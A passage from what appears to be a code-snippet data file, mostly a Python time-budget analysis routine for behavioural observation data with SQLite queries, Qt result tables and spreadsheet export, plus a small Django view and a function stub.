= \"-\"\n categories[subject][category][\"number\"] += behav[\"number\"]\n else:\n categories[subject][category] = {\"duration\": behav[\"duration\"], \"number\": behav[\"number\"]}\n\n out_sorted = []\n for subject in plot_parameters[\"selected subjects\"]:\n for behavior in plot_parameters[\"selected behaviors\"]:\n for row in out:\n if row[\"subject\"] == subject and row[\"behavior\"] == behavior:\n out_sorted.append(row)\n\n ### http://stackoverflow.com/questions/673867/python-arbitrary-order-by\n return out_sorted, categories", "def about(request, pk=None):\n if pk and get_grouptype('3') in request.user.groups.all():\n ts = get_object_or_404(TimeSlot, pk=pk)\n else:\n ts = get_timeslot()\n return render(request, \"results/about_grades.html\", {\n 'scores': CategoryAspectResult.ResultOptions,\n \"categories\": GradeCategory.objects.filter(TimeSlot=ts),\n 'ts': ts,\n })", "def getCategory():", "def time_budget(self, mode):\n\n def 
time_budget_analysis(cursor, plot_parameters, by_category=False):\n \"\"\"\n extract number of occurrences, total duration, mean ...\n if start_time = 0 and end_time = 0 all events are extracted\n \"\"\"\n\n categories, out = {}, []\n for subject in plot_parameters[\"selected subjects\"]:\n out_cat, categories[subject] = [], {}\n\n for behavior in plot_parameters[\"selected behaviors\"]:\n\n if plot_parameters[\"include modifiers\"]:\n\n cursor.execute(\"SELECT distinct modifiers FROM events WHERE subject = ? AND code = ?\",\n (subject, behavior))\n distinct_modifiers = list(cursor.fetchall())\n\n if not distinct_modifiers:\n if not plot_parameters[\"exclude behaviors\"]:\n\n if {self.pj[ETHOGRAM][idx][\"type\"] for idx in self.pj[ETHOGRAM] if\n self.pj[ETHOGRAM][idx][\"code\"] == behavior} == {\"State event\"}:\n out.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"-\",\n \"duration\": 0,\n \"duration_mean\": 0,\n \"duration_stdev\": \"NA\",\n \"number\": \"0\",\n \"inter_duration_mean\": \"NA\",\n \"inter_duration_stdev\": \"NA\"})\n else: # point\n out.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"-\",\n \"duration\": \"NA\",\n \"duration_mean\": \"NA\",\n \"duration_stdev\": \"NA\",\n \"number\": \"0\",\n \"inter_duration_mean\": \"NA\",\n \"inter_duration_stdev\": \"NA\"})\n continue\n\n if POINT in self.eventType(behavior).upper():\n for modifier in distinct_modifiers:\n\n cursor.execute((\"SELECT occurence, observation FROM events \"\n \"WHERE subject = ? \"\n \"AND code = ? \"\n \"AND modifiers = ? \"\n \"ORDER BY observation, occurence\"),\n (subject, behavior, modifier[0]))\n\n rows = cursor.fetchall()\n\n # inter events duration\n all_event_interdurations = []\n for idx, row in enumerate(rows):\n if idx and row[1] == rows[idx - 1][1]:\n all_event_interdurations.append(float(row[0]) - float(rows[idx - 1][0]))\n\n out_cat.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": modifier[0],\n \"duration\": \"NA\",\n \"duration_mean\": \"NA\",\n \"duration_stdev\": \"NA\",\n \"number\": len(rows),\n \"inter_duration_mean\": round(statistics.mean(all_event_interdurations),\n 3) if len(\n all_event_interdurations) else \"NA\",\n \"inter_duration_stdev\": round(\n statistics.stdev(all_event_interdurations), 3) if len(\n all_event_interdurations) > 1 else \"NA\"\n })\n\n if STATE in self.eventType(behavior).upper():\n for modifier in distinct_modifiers:\n\n cursor.execute((\"SELECT occurence, observation FROM events \"\n \"WHERE subject = ? \"\n \"AND code = ? \"\n \"AND modifiers = ? 
\"\n \"ORDER BY observation, occurence\"),\n (subject, behavior, modifier[0]))\n\n rows = list(cursor.fetchall())\n if len(rows) % 2:\n out.append({\"subject\": subject, \"behavior\": behavior,\n \"modifiers\": modifier[0], \"duration\": UNPAIRED,\n \"duration_mean\": UNPAIRED, \"duration_stdev\": UNPAIRED,\n \"number\": UNPAIRED, \"inter_duration_mean\": UNPAIRED,\n \"inter_duration_stdev\": UNPAIRED})\n else:\n all_event_durations, all_event_interdurations = [], []\n for idx, row in enumerate(rows):\n # event\n if idx % 2 == 0:\n new_init, new_end = float(row[0]), float(rows[idx + 1][0])\n\n all_event_durations.append(new_end - new_init)\n\n # inter event if same observation\n if idx % 2 and idx != len(rows) - 1 and row[1] == rows[idx + 1][1]:\n if plot_parameters[\"start time\"] <= row[0] <= plot_parameters[\n \"end time\"] and plot_parameters[\"start time\"] <= rows[idx + 1][0] <= \\\n plot_parameters[\"end time\"]:\n all_event_interdurations.append(float(rows[idx + 1][0]) - float(row[0]))\n\n # all_event_interdurations.append(float(rows[idx + 1][0]) - float(row[0]))\n\n out_cat.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": modifier[0],\n \"duration\": round(sum(all_event_durations), 3),\n \"duration_mean\": round(statistics.mean(all_event_durations),\n 3) if len(all_event_durations) else \"NA\",\n \"duration_stdev\": round(statistics.stdev(all_event_durations),\n 3) if len(\n all_event_durations) > 1 else \"NA\",\n \"number\": len(all_event_durations),\n \"inter_duration_mean\": round(\n statistics.mean(all_event_interdurations), 3) if len(\n all_event_interdurations) else \"NA\",\n \"inter_duration_stdev\": round(\n statistics.stdev(all_event_interdurations), 3) if len(\n all_event_interdurations) > 1 else \"NA\"\n })\n\n else: # no modifiers\n\n if POINT in self.eventType(behavior).upper():\n\n # if len(selectedObservations) > 1:\n cursor.execute(\n \"SELECT occurence,observation FROM events WHERE subject = ? AND code = ? 
ORDER BY observation, occurence\",\n (subject, behavior))\n\n rows = list(cursor.fetchall())\n\n if len(selectedObservations) == 1:\n new_rows = []\n for occurence, observation in rows:\n new_occurence = max(float(plot_parameters[\"start time\"]), occurence)\n new_occurence = min(new_occurence, float(plot_parameters[\"end time\"]))\n new_rows.append([new_occurence, observation])\n rows = list(new_rows)\n\n if not len(rows):\n if not plot_parameters[\"exclude behaviors\"]:\n\n if {self.pj[ETHOGRAM][idx][\"type\"] for idx in self.pj[ETHOGRAM] if\n self.pj[ETHOGRAM][idx][\"code\"] == behavior} == {\"State event\"}:\n out.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"\",\n \"duration\": 0,\n \"duration_mean\": 0,\n \"duration_stdev\": \"NA\",\n \"number\": \"0\",\n \"inter_duration_mean\": \"NA\",\n \"inter_duration_stdev\": \"NA\"})\n else: # point\n out.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"\",\n \"duration\": \"NA\",\n \"duration_mean\": \"NA\",\n \"duration_stdev\": \"NA\",\n \"number\": \"0\",\n \"inter_duration_mean\": \"NA\",\n \"inter_duration_stdev\": \"NA\"})\n continue\n\n # inter events duration\n all_event_interdurations = []\n for idx, row in enumerate(rows):\n if idx and row[1] == rows[idx - 1][1]:\n all_event_interdurations.append(float(row[0]) - float(rows[idx - 1][0]))\n\n out_cat.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"-\",\n \"duration\": \"NA\",\n \"duration_mean\": \"NA\",\n \"duration_stdev\": \"NA\",\n \"number\": len(rows),\n \"inter_duration_mean\": round(statistics.mean(all_event_interdurations),\n 3) if len(all_event_interdurations) else \"NA\",\n \"inter_duration_stdev\": round(statistics.stdev(all_event_interdurations),\n 3) if len(\n all_event_interdurations) > 1 else \"NA\"\n })\n\n if STATE in self.eventType(behavior).upper():\n\n cursor.execute(\n \"SELECT occurence, observation FROM events WHERE subject = ? AND code = ? 
ORDER BY observation, occurence\",\n (subject, behavior))\n\n rows = list(cursor.fetchall())\n if not len(rows):\n if not plot_parameters[\"exclude behaviors\"]: # include behaviors without events\n out.append({\"subject\": subject, \"behavior\": behavior,\n \"modifiers\": \"-\", \"duration\": 0, \"duration_mean\": 0,\n \"duration_stdev\": \"NA\", \"number\": 0, \"inter_duration_mean\": \"-\",\n \"inter_duration_stdev\": \"-\"})\n continue\n\n if len(rows) % 2:\n out.append({\"subject\": subject, \"behavior\": behavior, \"modifiers\": \"NA\",\n \"duration\": UNPAIRED, \"duration_mean\": UNPAIRED, \"duration_stdev\": UNPAIRED,\n \"number\": UNPAIRED, \"inter_duration_mean\": UNPAIRED,\n \"inter_duration_stdev\": UNPAIRED})\n else:\n all_event_durations, all_event_interdurations = [], []\n for idx, row in enumerate(rows):\n # event\n if idx % 2 == 0:\n new_init, new_end = float(row[0]), float(rows[idx + 1][0])\n\n all_event_durations.append(new_end - new_init)\n\n # inter event if same observation\n if idx % 2 and idx != len(rows) - 1 and row[1] == rows[idx + 1][1]:\n if plot_parameters[\"start time\"] <= row[0] <= plot_parameters[\"end time\"] and \\\n plot_parameters[\"start time\"] <= rows[idx + 1][0] <= plot_parameters[\n \"end time\"]:\n all_event_interdurations.append(float(rows[idx + 1][0]) - float(row[0]))\n\n out_cat.append({\"subject\": subject,\n \"behavior\": behavior,\n \"modifiers\": \"-\",\n \"duration\": round(sum(all_event_durations), 3),\n \"duration_mean\": round(statistics.mean(all_event_durations), 3) if len(\n all_event_durations) else \"NA\",\n \"duration_stdev\": round(statistics.stdev(all_event_durations),\n 3) if len(all_event_durations) > 1 else \"NA\",\n \"number\": len(all_event_durations),\n \"inter_duration_mean\": round(statistics.mean(all_event_interdurations),\n 3) if len(\n all_event_interdurations) else \"NA\",\n \"inter_duration_stdev\": round(\n statistics.stdev(all_event_interdurations), 3) if len(\n all_event_interdurations) > 1 else \"NA\"\n })\n\n out += out_cat\n\n if by_category: # and flagCategories:\n\n for behav in out_cat:\n\n try:\n category = [self.pj[ETHOGRAM][x][\"category\"] for x in self.pj[ETHOGRAM] if\n \"category\" in self.pj[ETHOGRAM][x] and self.pj[ETHOGRAM][x][\"code\"] == behav[\n 'behavior']][0]\n except:\n category = \"\"\n\n if category in categories[subject]:\n if behav[\"duration\"] not in [\"-\", \"NA\"] and categories[subject][category][\n \"duration\"] != \"-\":\n categories[subject][category][\"duration\"] += behav[\"duration\"]\n else:\n categories[subject][category][\"duration\"] = \"-\"\n categories[subject][category][\"number\"] += behav[\"number\"]\n else:\n categories[subject][category] = {\"duration\": behav[\"duration\"], \"number\": behav[\"number\"]}\n\n out_sorted = []\n for subject in plot_parameters[\"selected subjects\"]:\n for behavior in plot_parameters[\"selected behaviors\"]:\n for row in out:\n if row[\"subject\"] == subject and row[\"behavior\"] == behavior:\n out_sorted.append(row)\n\n ### http://stackoverflow.com/questions/673867/python-arbitrary-order-by\n return out_sorted, categories\n\n def default_value(behav, param):\n \"\"\"\n return value for duration in case of point event\n \"\"\"\n default_value_ = 0\n if ({self.pj[ETHOGRAM][idx][\"type\"] for idx in self.pj[ETHOGRAM] if\n self.pj[ETHOGRAM][idx][\"code\"] == behav} == {\"Point event\"}\n and param in [\"duration\"]):\n default_value_ = \"-\"\n return default_value_\n\n def init_behav_modif():\n \"\"\"\n initialize dictionary with subject, 
behaviors and modifiers\n \"\"\"\n behaviors = {}\n for subj in plot_parameters[\"selected subjects\"]:\n behaviors[subj] = {}\n for behav_modif in distinct_behav_modif:\n behav, modif = behav_modif\n if behav not in behaviors[subj]:\n behaviors[subj][behav] = {}\n if not plot_parameters[\"include modifiers\"]:\n for param in parameters:\n behaviors[subj][behav][param[0]] = default_value(behav, param[0])\n\n if plot_parameters[\"include modifiers\"]:\n behaviors[subj][behav][modif] = {}\n for param in parameters:\n behaviors[subj][behav][modif][param[0]] = default_value(behav, param[0])\n\n return behaviors\n\n result, selectedObservations = self.selectObservations(MULTIPLE)\n if not selectedObservations:\n return\n\n # check if state events are paired\n out = \"\"\n not_paired_obs_list = []\n for obsId in selectedObservations:\n r, msg = project_functions.check_state_events_obs(obsId, self.pj[ETHOGRAM],\n self.pj[OBSERVATIONS][obsId], self.timeFormat)\n\n if not r:\n out += \"Observation: <strong>{obsId}</strong><br>{msg}<br>\".format(obsId=obsId, msg=msg)\n not_paired_obs_list.append(obsId)\n\n if out:\n out = \"Some observations have UNPAIRED state events<br><br>\" + out\n self.results = dialog.Results_dialog()\n self.results.setWindowTitle(programName + \" - Check selected observations\")\n self.results.ptText.setReadOnly(True)\n self.results.ptText.appendHtml(out)\n self.results.pbSave.setVisible(False)\n self.results.pbCancel.setVisible(True)\n\n if not self.results.exec_():\n return\n\n flagGroup = False\n if len(selectedObservations) > 1 and mode != \"synthetic\":\n flagGroup = dialog.MessageDialog(programName, \"Group observations in one time budget analysis?\",\n [YES, NO]) == YES\n\n '''\n # check if state events are paired\n out = \"\"\n for obsId in selectedObservations:\n r, msg = project_functions.check_state_events_obs(obsId, self.pj[ETHOGRAM],\n self.pj[OBSERVATIONS][obsId],\n self.timeFormat)\n if not r:\n out += \"Observation: <strong>{obsId}</strong><br>{msg}<br>\".format(obsId=obsId, msg=msg)\n if out:\n self.results = dialog.ResultsWidget()\n self.results.setWindowTitle(programName + \" - Check selected observations\")\n self.results.ptText.setReadOnly(True)\n self.results.ptText.appendHtml(out)\n self.results.show()\n '''\n\n selectedObsTotalMediaLength = Decimal(\"0.0\")\n max_obs_length = 0\n for obsId in selectedObservations:\n obs_length = project_functions.observation_total_length(self.pj[OBSERVATIONS][obsId])\n\n logging.debug(\"media length for {0}: {1}\".format(obsId, obs_length))\n\n if obs_length in [0, -1]:\n selectedObsTotalMediaLength = -1\n break\n max_obs_length = max(max_obs_length, obs_length)\n\n selectedObsTotalMediaLength += obs_length\n\n # an observation media length is not available\n if selectedObsTotalMediaLength == -1:\n # propose to user to use max event time\n if dialog.MessageDialog(programName,\n \"A media length is not available.<br>Use last event time as media length?\",\n [YES, NO]) == YES:\n maxTime = 0 # max length for all events all subjects\n for obsId in selectedObservations:\n if self.pj[OBSERVATIONS][obsId][EVENTS]:\n maxTime += max(self.pj[OBSERVATIONS][obsId][EVENTS])[0]\n logging.debug(\"max time all events all subjects: {}\".format(maxTime))\n selectedObsTotalMediaLength = maxTime\n else:\n selectedObsTotalMediaLength = 0\n\n logging.debug(\"selectedObsTotalMediaLength: {}\".format(selectedObsTotalMediaLength))\n\n if mode in [\"by_behavior\", \"by_category\"]:\n if len(selectedObservations) > 1:\n plot_parameters = 
self.choose_obs_subj_behav_category(selectedObservations,\n maxTime=max_obs_length,\n by_category=(mode == \"by_category\"))\n else:\n plot_parameters = self.choose_obs_subj_behav_category(selectedObservations,\n maxTime=selectedObsTotalMediaLength,\n by_category=(mode == \"by_category\"))\n\n if mode == \"synthetic\":\n plot_parameters = self.choose_obs_subj_behav_category(selectedObservations,\n maxTime=max_obs_length,\n flagShowExcludeBehaviorsWoEvents=False,\n by_category=False)\n\n if not plot_parameters[\"selected subjects\"] or not plot_parameters[\"selected behaviors\"]:\n return\n\n # check if time_budget window must be used\n if mode in [\"by_behavior\", \"by_category\"] and (flagGroup or len(selectedObservations) == 1):\n\n cursor = db_functions.load_events_in_db(self.pj, plot_parameters[\"selected subjects\"], selectedObservations,\n plot_parameters[\"selected behaviors\"])\n\n total_observation_time = 0\n for obsId in selectedObservations:\n\n obs_length = project_functions.observation_total_length(self.pj[OBSERVATIONS][obsId])\n\n if obs_length == -1:\n obs_length = 0\n\n if plot_parameters[\"time\"] == TIME_FULL_OBS:\n min_time = float(0)\n max_time = float(obs_length)\n\n if plot_parameters[\"time\"] == TIME_EVENTS:\n try:\n min_time = float(self.pj[OBSERVATIONS][obsId][\"events\"][0][0])\n except:\n min_time = float(0)\n try:\n max_time = float(self.pj[OBSERVATIONS][obsId][\"events\"][-1][0])\n except:\n max_time = float(obs_length)\n\n if plot_parameters[\"time\"] == TIME_ARBITRARY_INTERVAL:\n min_time = float(plot_parameters[\"start time\"])\n max_time = float(plot_parameters[\"end time\"])\n\n # check intervals\n for subj in plot_parameters[\"selected subjects\"]:\n for behav in plot_parameters[\"selected behaviors\"]:\n if POINT in self.eventType(behav).upper():\n continue\n # extract modifiers\n\n cursor.execute(\n \"SELECT distinct modifiers FROM events WHERE observation = ? AND subject = ? AND code = ?\",\n (obsId, subj, behav))\n distinct_modifiers = list(cursor.fetchall())\n\n logging.debug(\"distinct_modifiers: {}\".format(distinct_modifiers))\n\n for modifier in distinct_modifiers:\n\n logging.debug(\"modifier #{}#\".format(modifier[0]))\n\n if len(cursor.execute(\n \"SELECT * FROM events WHERE observation = ? AND subject = ? AND code = ? AND modifiers = ? AND occurence < ?\",\n (obsId, subj, behav, modifier[0], min_time)).fetchall()) % 2:\n cursor.execute(\n \"INSERT INTO events (observation, subject, code, type, modifiers, occurence) VALUES (?,?,?,?,?,?)\",\n (obsId, subj, behav, \"STATE\", modifier[0], min_time))\n\n if len(cursor.execute(\n \"SELECT * FROM events WHERE observation = ? AND subject = ? AND code = ? AND modifiers = ? AND occurence > ?\",\n (obsId, subj, behav, modifier[0], max_time)).fetchall()) % 2:\n cursor.execute(\n \"INSERT INTO events (observation, subject, code, type, modifiers, occurence) VALUES (?,?,?,?,?,?)\",\n (obsId, subj, behav, \"STATE\", modifier[0], max_time))\n try:\n cursor.execute(\"COMMIT\")\n except:\n pass\n\n total_observation_time += (max_time - min_time)\n\n cursor.execute(\"DELETE FROM events WHERE observation = ? AND (occurence < ? 
OR occurence > ?)\",\n (obsId, min_time, max_time))\n\n out, categories = time_budget_analysis(cursor, plot_parameters, by_category=(mode == \"by_category\"))\n\n # widget for results visualization\n self.tb = timeBudgetResults(logging.getLogger().getEffectiveLevel(), self.pj)\n\n # observations list\n self.tb.label.setText(\"Selected observations\")\n for obs in selectedObservations:\n self.tb.lw.addItem(obs)\n\n # media length\n if len(selectedObservations) > 1:\n if total_observation_time:\n if self.timeFormat == HHMMSS:\n self.tb.lbTotalObservedTime.setText(\n \"Total observation length: {}\".format(seconds2time(total_observation_time)))\n if self.timeFormat == S:\n self.tb.lbTotalObservedTime.setText(\n \"Total observation length: {:0.3f}\".format(float(total_observation_time)))\n else:\n self.tb.lbTotalObservedTime.setText(\"Total observation length: not available\")\n else:\n if self.timeFormat == HHMMSS:\n self.tb.lbTotalObservedTime.setText(\n \"Analysis from {} to {}\".format(seconds2time(min_time), seconds2time(max_time)))\n if self.timeFormat == S:\n self.tb.lbTotalObservedTime.setText(\n \"Analysis from {:0.3f} to {:0.3f} s\".format(float(min_time), float(max_time)))\n\n if mode == \"by_behavior\":\n\n tb_fields = [\"Subject\", \"Behavior\", \"Modifiers\", \"Total number\", \"Total duration (s)\",\n \"Duration mean (s)\", \"Duration std dev\", \"inter-event intervals mean (s)\",\n \"inter-event intervals std dev\", \"% of total length\"]\n\n fields = [\"subject\", \"behavior\", \"modifiers\", \"number\", \"duration\", \"duration_mean\", \"duration_stdev\",\n \"inter_duration_mean\", \"inter_duration_stdev\"]\n self.tb.twTB.setColumnCount(len(tb_fields))\n self.tb.twTB.setHorizontalHeaderLabels(tb_fields)\n\n for row in out:\n self.tb.twTB.setRowCount(self.tb.twTB.rowCount() + 1)\n column = 0\n for field in fields:\n item = QTableWidgetItem(str(row[field]).replace(\" ()\", \"\"))\n # no modif allowed\n item.setFlags(Qt.ItemIsEnabled)\n self.tb.twTB.setItem(self.tb.twTB.rowCount() - 1, column, item)\n column += 1\n\n # % of total time\n if row[\"duration\"] not in [\"NA\", \"-\", UNPAIRED, 0] and selectedObsTotalMediaLength:\n item = QTableWidgetItem(str(round(row[\"duration\"] / float(total_observation_time) * 100, 1)))\n else:\n item = QTableWidgetItem(\"NA\")\n\n item.setFlags(Qt.ItemIsEnabled)\n self.tb.twTB.setItem(self.tb.twTB.rowCount() - 1, column, item)\n\n if mode == \"by_category\":\n tb_fields = [\"Subject\", \"Category\", \"Total number\", \"Total duration (s)\"]\n fields = [\"number\", \"duration\"]\n self.tb.twTB.setColumnCount(len(tb_fields))\n self.tb.twTB.setHorizontalHeaderLabels(tb_fields)\n\n for subject in categories:\n\n for category in categories[subject]:\n\n self.tb.twTB.setRowCount(self.tb.twTB.rowCount() + 1)\n\n column = 0\n item = QTableWidgetItem(subject)\n item.setFlags(Qt.ItemIsEnabled)\n self.tb.twTB.setItem(self.tb.twTB.rowCount() - 1, column, item)\n\n column = 1\n if category == \"\":\n item = QTableWidgetItem(\"No category\")\n else:\n item = QTableWidgetItem(category)\n item.setFlags(Qt.ItemIsEnabled)\n self.tb.twTB.setItem(self.tb.twTB.rowCount() - 1, column, item)\n\n for field in fields:\n column += 1\n item = QTableWidgetItem(str(categories[subject][category][field]))\n item.setFlags(Qt.ItemIsEnabled)\n item.setTextAlignment(Qt.AlignRight | Qt.AlignVCenter)\n self.tb.twTB.setItem(self.tb.twTB.rowCount() - 1, column, item)\n\n self.tb.twTB.resizeColumnsToContents()\n\n self.tb.show()\n\n if mode in [\"by_behavior\", \"by_category\"] and 
(\n not flagGroup and len(selectedObservations) > 1) or mode == \"synthetic\":\n\n if mode in [\"by_behavior\", \"by_category\"]:\n items = (\"Tab Separated Values (*.tsv)\",\n \"Comma separated values (*.csv)\",\n \"OpenDocument Spreadsheet (*.ods)\",\n \"OpenDocument Workbook (*.ods)\",\n \"Microsoft Excel Spreadsheet (*.xlsx)\",\n \"Microsoft Excel Workbook (*.xlsx)\",\n \"HTML (*.html)\",\n \"Legacy Microsoft Excel Spreadsheet (*.xls)\")\n\n formats = [\"tsv\", \"csv\", \"od spreadsheet\", \"od workbook\", \"xlsx spreadsheet\", \"xlsx workbook\", \"html\",\n \"xls legacy\"]\n\n item, ok = QInputDialog.getItem(self, \"Time budget analysis format\", \"Available formats\", items, 0,\n False)\n if not ok:\n return\n\n outputFormat = formats[items.index(item)]\n extension = re.sub(\".* \\(\\*\\.\", \"\", item)[:-1]\n\n flagWorkBook = False\n\n if mode in [\"by_behavior\", \"by_category\"] and \"workbook\" in outputFormat:\n workbook = tablib.Databook()\n flagWorkBook = True\n if \"xls\" in outputFormat:\n filters = \"Microsoft Excel Workbook *.xlsx (*.xlsx);;All files (*)\"\n if \"od\" in outputFormat:\n filters = \"Open Document Workbook *.ods (*.ods);;All files (*)\"\n\n if QT_VERSION_STR[0] == \"4\":\n WBfileName, filter_ = QFileDialog(self).getSaveFileNameAndFilter(self, \"Save Time budget analysis\",\n \"\", filters)\n else:\n WBfileName, filter_ = QFileDialog(self).getSaveFileName(self, \"Save Time budget analysis\", \"\",\n filters)\n if not WBfileName:\n return\n\n if mode in [\"by_behavior\", \"by_category\"] and \"workbook\" not in outputFormat: # not workbook\n exportDir = QFileDialog(self).getExistingDirectory(self,\n \"Choose a directory to save the time budget analysis\",\n os.path.expanduser(\"~\"),\n options=QFileDialog.ShowDirsOnly)\n if not exportDir:\n return\n\n if mode == \"synthetic\":\n\n formats_str = (\"Tab Separated Values *.txt, *.tsv (*.txt *.tsv);;\"\n \"Comma Separated Values *.txt *.csv (*.txt *.csv);;\"\n \"Open Document Spreadsheet *.ods (*.ods);;\"\n \"Microsoft Excel Spreadsheet *.xlsx (*.xlsx);;\"\n # \"Pandas dataframe (*.df);;\"\n \"Legacy Microsoft Excel Spreadsheet *.xls (*.xls);;\"\n \"HTML *.html (*.html);;\"\n \"All files (*)\")\n\n while True:\n if QT_VERSION_STR[0] == \"4\":\n fileName, filter_ = QFileDialog(self).getSaveFileNameAndFilter(self, \"Save Time budget report\",\n \"\", formats_str)\n else:\n fileName, filter_ = QFileDialog(self).getSaveFileName(self, \"Save Time budget report\", \"\",\n formats_str)\n\n if not fileName:\n return\n\n extension = \"\"\n availableFormats = (\n \"tsv\", \"csv\", \"ods\", \"xlsx)\", \"xls)\", \"html\") # ) is added to distinguish between xls and xlsx\n for fileExtension in availableFormats:\n if fileExtension in filter_:\n extension = fileExtension.replace(\")\", \"\")\n if not extension:\n QMessageBox.warning(self, programName, \"Choose a file format\",\n QMessageBox.Ok | QMessageBox.Default, QMessageBox.NoButton)\n else:\n break\n\n data_report = tablib.Dataset()\n data_report.title = \"Synthetic time budget\"\n\n parameters = [[\"duration\", \"Total duration\"], [\"number\", \"Number of occurrences\"]]\n\n cursor = db_functions.load_events_in_db(self.pj, plot_parameters[\"selected subjects\"],\n selectedObservations, plot_parameters[\"selected behaviors\"])\n\n cursor.execute(\"SELECT distinct code, modifiers FROM events WHERE subject in ({})\".format(\n \",\".join(\"?\" * len(plot_parameters[\"selected subjects\"]))),\n (plot_parameters[\"selected subjects\"]))\n\n distinct_behav_modif = 
[[rows[\"code\"], rows[\"modifiers\"]] for rows in cursor.fetchall()]\n\n # add selected behaviors that are not observed\n for behav in plot_parameters[\"selected behaviors\"]:\n if [x for x in distinct_behav_modif if x[0] == behav] == []:\n distinct_behav_modif.append([behav, \"-\"])\n\n behaviors = init_behav_modif()\n\n subj_header, behav_header, modif_header, param_header = [\"\", \"\"], [\"\", \"\"], [\"\", \"\"], [\"\",\n \"Total length (s)\"]\n # subj_header, behav_header, modif_header, param_header = [\"\"], [\"\"], [\"\"], [\"\"]\n for subj in plot_parameters[\"selected subjects\"]:\n for behav in plot_parameters[\"selected behaviors\"]:\n if not plot_parameters[\"include modifiers\"]:\n for param in parameters:\n subj_header.append(subj)\n behav_header.append(behav)\n param_header.append(param[1])\n\n if plot_parameters[\"include modifiers\"]:\n for modif in sorted(list(behaviors[subj][behav].keys())):\n for param in parameters:\n subj_header.append(subj)\n behav_header.append(behav)\n modif_header.append(modif)\n param_header.append(param[1])\n\n data_report.append(subj_header)\n data_report.append(behav_header)\n if plot_parameters[\"include modifiers\"]:\n data_report.append(modif_header)\n data_report.append(param_header)\n\n if mode == \"by_behavior\":\n fields = [\"subject\", \"behavior\", \"modifiers\", \"number\",\n \"duration\", \"duration_mean\", \"duration_stdev\",\n \"inter_duration_mean\", \"inter_duration_stdev\"]\n\n if mode == \"by_category\":\n fields = [\"subject\", \"category\", \"number\", \"duration\"]\n\n for obsId in selectedObservations:\n\n cursor = db_functions.load_events_in_db(self.pj, plot_parameters[\"selected subjects\"], [obsId],\n plot_parameters[\"selected behaviors\"])\n\n obs_length = project_functions.observation_total_length(self.pj[OBSERVATIONS][obsId])\n\n if obs_length == -1:\n obs_length = 0\n\n if plot_parameters[\"time\"] == TIME_FULL_OBS:\n min_time = float(0)\n max_time = float(obs_length)\n\n if plot_parameters[\"time\"] == TIME_EVENTS:\n try:\n min_time = float(self.pj[OBSERVATIONS][obsId][\"events\"][0][0])\n except:\n min_time = float(0)\n try:\n max_time = float(self.pj[OBSERVATIONS][obsId][\"events\"][-1][0])\n except:\n max_time = float(obs_length)\n\n if plot_parameters[\"time\"] == TIME_ARBITRARY_INTERVAL:\n min_time = float(plot_parameters[\"start time\"])\n max_time = float(plot_parameters[\"end time\"])\n\n # check intervals\n for subj in plot_parameters[\"selected subjects\"]:\n for behav in plot_parameters[\"selected behaviors\"]:\n if POINT in self.eventType(behav).upper():\n continue\n # extract modifiers\n # if plot_parameters[\"include modifiers\"]:\n\n cursor.execute(\n \"SELECT distinct modifiers FROM events WHERE observation = ? AND subject = ? AND code = ?\",\n (obsId, subj, behav))\n distinct_modifiers = list(cursor.fetchall())\n\n for modifier in distinct_modifiers:\n\n if len(cursor.execute(\n \"\"\"SELECT * FROM events WHERE observation = ? AND subject = ? AND code = ? AND modifiers = ? AND occurence < ?\"\"\",\n (obsId, subj, behav, modifier[0], min_time)).fetchall()) % 2:\n cursor.execute(\n \"INSERT INTO events (observation, subject, code, type, modifiers, occurence) VALUES (?,?,?,?,?,?)\",\n (obsId, subj, behav, \"STATE\", modifier[0], min_time))\n if len(cursor.execute(\n \"\"\"SELECT * FROM events WHERE observation = ? AND subject = ? AND code = ? AND modifiers = ? 
AND occurence > ?\"\"\",\n (obsId, subj, behav, modifier[0], max_time)).fetchall()) % 2:\n cursor.execute(\n \"INSERT INTO events (observation, subject, code, type, modifiers, occurence) VALUES (?,?,?,?,?,?)\",\n (obsId, subj, behav, \"STATE\", modifier[0], max_time))\n try:\n cursor.execute(\"COMMIT\")\n except:\n pass\n\n cursor.execute(\"\"\"DELETE FROM events WHERE observation = ? AND (occurence < ? OR occurence > ?)\"\"\",\n (obsId, min_time, max_time))\n\n out, categories = time_budget_analysis(cursor, plot_parameters, by_category=(mode == \"by_category\"))\n\n if mode == \"synthetic\":\n\n behaviors = init_behav_modif()\n\n for element in out:\n for param in parameters:\n if not plot_parameters[\"include modifiers\"]:\n try:\n behaviors[element[\"subject\"]][element[\"behavior\"]][param[0]] = element[param[0]]\n except:\n pass\n if plot_parameters[\"include modifiers\"]:\n try:\n behaviors[element[\"subject\"]][element[\"behavior\"]][element[\"modifiers\"]][param[0]] = \\\n element[param[0]]\n except:\n pass\n\n columns = []\n columns.append(obsId)\n columns.append(\"{:0.3f}\".format(max_time - min_time))\n # columns.append([obsId])\n\n for subj in plot_parameters[\"selected subjects\"]:\n for behav in plot_parameters[\"selected behaviors\"]:\n if not plot_parameters[\"include modifiers\"]:\n for param in parameters:\n columns.append(behaviors[subj][behav][param[0]])\n if plot_parameters[\"include modifiers\"]:\n for modif in sorted(list(behaviors[subj][behav].keys())):\n for param in parameters:\n columns.append(behaviors[subj][behav][modif][param[0]])\n\n data_report.append(columns)\n\n if mode in [\"by_behavior\", \"by_category\"]:\n rows = []\n # observation id\n rows.append([\"Observation id\", obsId])\n rows.append([\"\"])\n\n labels = [\"Independent variables\"]\n values = [\"\"]\n if INDEPENDENT_VARIABLES in self.pj and self.pj[INDEPENDENT_VARIABLES]:\n for idx in self.pj[INDEPENDENT_VARIABLES]:\n labels.append(self.pj[INDEPENDENT_VARIABLES][idx][\"label\"])\n if (INDEPENDENT_VARIABLES in self.pj[OBSERVATIONS][obsId]\n and self.pj[INDEPENDENT_VARIABLES][idx][\"label\"] in self.pj[OBSERVATIONS][obsId][\n INDEPENDENT_VARIABLES]):\n values.append(self.pj[OBSERVATIONS][obsId][INDEPENDENT_VARIABLES][\n self.pj[INDEPENDENT_VARIABLES][idx][\"label\"]])\n rows.append(labels)\n rows.append(values)\n rows.append([\"\"])\n\n rows.append(\n [\"Analysis from\", \"{:0.3f}\".format(float(min_time)), \"to\", \"{:0.3f}\".format(float(max_time))])\n rows.append([\"Total length (s)\", \"{:0.3f}\".format(float(max_time - 